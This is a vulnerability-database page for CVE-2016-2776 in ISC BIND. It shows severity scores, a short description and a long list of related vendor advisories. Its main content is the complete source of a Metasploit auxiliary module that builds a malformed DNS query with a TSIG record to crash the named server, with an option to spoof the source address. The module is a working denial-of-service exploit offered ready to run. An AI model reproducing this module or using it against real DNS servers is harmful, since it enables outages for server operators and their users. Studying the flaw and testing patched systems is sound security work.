Lucene search
Martin Rocha, Ezequiel Tavella, Alejandro Parodi, Infobyte Research TeamMSF:AUXILIARY-DOS-DNS-BIND_TSIG-HistoryAug 26, 2017 - 3:41 p.m.
BIND TSIG Query Denial of Service
2017-08-2615:41:10
Martin Rocha, Ezequiel Tavella, Alejandro Parodi, Infobyte Research Team
www.rapid7.com
44
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
7.8 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:N/I:N/A:C
0.973 High
EPSS
Percentile
99.8%
A defect in the rendering of messages into packets can cause named to exit with an assertion failure in buffer.c while constructing a response to a query that meets certain criteria. This assertion can be triggered even if the apparent source address isn’t allowed to make queries.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Capture
include Msf::Auxiliary::UDPScanner
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'BIND TSIG Query Denial of Service',
'Description' => %q{
A defect in the rendering of messages into packets can cause named to
exit with an assertion failure in buffer.c while constructing a response
to a query that meets certain criteria.
This assertion can be triggered even if the apparent source address
isn't allowed to make queries.
},
# Research and Original PoC - msf module author
'Author' => [
'Martin Rocha',
'Ezequiel Tavella',
'Alejandro Parodi',
'Infobyte Research Team'
],
'References' => [
['CVE', '2016-2776'],
['URL', 'http://blog.infobytesec.com/2016/10/a-tale-of-dns-packet-cve-2016-2776.html']
],
'DisclosureDate' => '2016-09-27',
'License' => MSF_LICENSE,
'DefaultOptions' => {'ScannerRecvWindow' => 0}
))
register_options([
Opt::RPORT(53),
OptAddress.new('SRC_ADDR', [false, 'Source address to spoof'])
])
deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT')
end
def scan_host(ip)
if datastore['SRC_ADDR']
scanner_spoof_send(payload, ip, rport, datastore['SRC_ADDR'])
else
print_status("Sending packet to #{ip}")
scanner_send(payload, ip, rport)
end
end
def payload
query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65
query << "\x00\x00" # Flags: 0x0000 Standard query
query << "\x00\x01" # Questions: 1
query << "\x00\x00" # Answer RRs: 0
query << "\x00\x00" # Authority RRs: 0
query << "\x00\x01" # Additional RRs: 1
# Domain Name
query << get_domain # Random DNS Name
query << "\x00" # [End of name]
query << "\x00\x01" # Type: A (Host Address) (1)
query << "\x00\x01" # Class: IN (0x0001)
# Additional records. Name
query << ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #192 bytes
query << "\x3d"+Rex::Text.rand_text_alphanumeric(61)
query << "\x00"
query << "\x00\xfa" # Type: TSIG (Transaction Signature) (250)
query << "\x00\xff" # Class: ANY (0x00ff)
query << "\x00\x00\x00\x00" # Time to live: 0
query << "\x00\xfc" # Data length: 252
# Algorithm Name
query << ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #Random 192 bytes
query << "\x1A"+Rex::Text.rand_text_alphanumeric(26) #Random 26 bytes
query << "\x00"
# Rest of TSIG
query << "\x00\x00"+Rex::Text.rand_text_alphanumeric(4) # Time Signed: Jan 1, 1970 03:15:07.000000000 ART
query << "\x01\x2c" # Fudge: 300
query << "\x00\x10" # MAC Size: 16
query << Rex::Text.rand_text_alphanumeric(16) # MAC
query << "\x8f\x65" # Original Id: 36709
query << "\x00\x00" # Error: No error (0)
query << "\x00\x00" # Other len: 0
end
def get_domain
domain = "\x06"+Rex::Text.rand_text_alphanumeric(6)
org = "\x03"+Rex::Text.rand_text_alphanumeric(3)
domain+org
end
end
Related
nessus
nessus
Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / 14.2 / current : bind (SSA:2016-271-01)
2016-09-28 00:00:00
Oracle Linux 5 / 6 / 7 : bind (ELSA-2016-1944)
2016-09-29 00:00:00
OracleVM 3.2 : bind (OVMSA-2016-0137)
2016-09-29 00:00:00
fedora
fedora
[SECURITY] Fedora 24 Update: bind-9.10.4-2.P3.fc24
2016-10-01 00:53:36
[SECURITY] Fedora 24 Update: bind99-9.9.9-2.P3.fc24
2016-10-03 17:23:31
[SECURITY] Fedora 23 Update: bind-9.10.4-2.P3.fc23
2016-10-24 23:52:28
altlinux
altlinux
Security fix for the ALT Linux 9 package bind version 9.9.8-alt4
2016-09-27 00:00:00
Security fix for the ALT Linux 6 package bind version 9.3.6-alt7.M60P.2
2016-10-04 00:00:00
Security fix for the ALT Linux 7 package bind version 9.9.8-alt2.M70P.2
2016-09-27 00:00:00
osv
osv
CVE-2016-2776
2016-09-28 10:59:00
bind9 - security update
2016-10-05 00:00:00
bind9 - security update
2016-09-27 00:00:00
exploitpack
exploitpack
ISC BIND 9 - Denial of Service
2016-10-04 00:00:00
f5
f5
SOL18829561 - BIND vulnerability CVE-2016-2776
2016-09-27 00:00:00
K18829561 : BIND vulnerability CVE-2016-2776
2016-09-27 00:00:00
suse
suse
Security update for bind (critical)
2016-09-28 11:09:52
Security update for bind (critical)
2016-09-27 21:10:06
Security update for bind (critical)
2016-09-27 22:09:45
zdt
zdt
Bind 9 DNS Server - Denial of Service Exploit
2016-10-04 00:00:00
slackware
slackware
[slackware-security] bind
2016-09-27 19:49:07
centos
centos
bind97 security update
2016-09-28 14:01:06
bind, caching security update
2016-09-28 14:00:32
openvas
openvas
CentOS Update for bind CESA-2016:1944 centos5
2016-09-29 00:00:00
Slackware: Security Advisory (SSA:2016-271-01)
2022-04-21 00:00:00
ubuntucve
ubuntucve
CVE-2016-2776
2016-09-27 00:00:00
prion
prion
Design/Logic Flaw
2016-09-28 10:59:00
archlinux
archlinux
[ASA-201609-29] bind: denial of service
2016-09-27 00:00:00
debiancve
debiancve
CVE-2016-2776
2016-09-28 10:59:00
checkpoint_advisories
checkpoint_advisories
amazon
amazon
Important: bind
2016-09-28 15:45:00
redhat
redhat
(RHSA-2016:1944) Important: bind security update
2016-09-28 00:00:00
(RHSA-2016:1945) Important: bind97 security update
2016-09-28 00:00:00
(RHSA-2016:2099) Important: bind security update
2016-10-25 07:38:10
freebsd_advisory
freebsd_advisory
FreeBSD-SA-16:28.bind
2016-10-10 00:00:00
ubuntu
ubuntu
Bind vulnerability
2016-09-27 00:00:00
veracode
veracode
Denial Of Service (DoS)
2019-01-15 09:13:15
redhatcve
redhatcve
CVE-2016-2776
2020-04-09 09:15:08
packetstorm
packetstorm
BIND 9 DNS Server Denial Of Service
2016-10-04 00:00:00
cve
cve
CVE-2016-2776
2016-09-28 10:59:00
alpinelinux
alpinelinux
CVE-2016-2776
2016-09-28 10:59:00
freebsd
freebsd
BIND -- Remote Denial of Service vulnerability
2016-09-27 00:00:00
cloudfoundry
cloudfoundry
USN-3088-1: Bind vulnerability | Cloud Foundry
2016-12-13 00:00:00
exploitdb
exploitdb
ISC BIND 9 - Denial of Service
2016-10-04 00:00:00
debian
debian
[SECURITY] [DLA 645-1] bind9 security update
2016-10-05 17:44:33
[SECURITY] [DSA 3680-1] bind9 security update
2016-09-27 18:52:22
mageia
mageia
Updated bind packages fix security vulnerability
2016-10-04 15:20:54
aix
aix
Vulnerabilities in BIND impact AIX,Vulnerabilities in BIND impact VIOS
2016-11-18 08:19:36
threatpost
threatpost
ISC Patches Critical Error Condition in BIND
2016-09-28 16:29:53
ibm
ibm
oraclelinux
oraclelinux
bind security update
2016-11-09 00:00:00
bind security update
2016-09-28 00:00:00
bind97 security update
2016-09-28 00:00:00
gentoo
gentoo
BIND: Multiple vulnerabilities
2016-10-11 00:00:00
photon
photon
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
7.8 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:N/I:N/A:C
0.973 High
EPSS
Percentile
99.8%
Related for MSF:AUXILIARY-DOS-DNS-BIND_TSIG-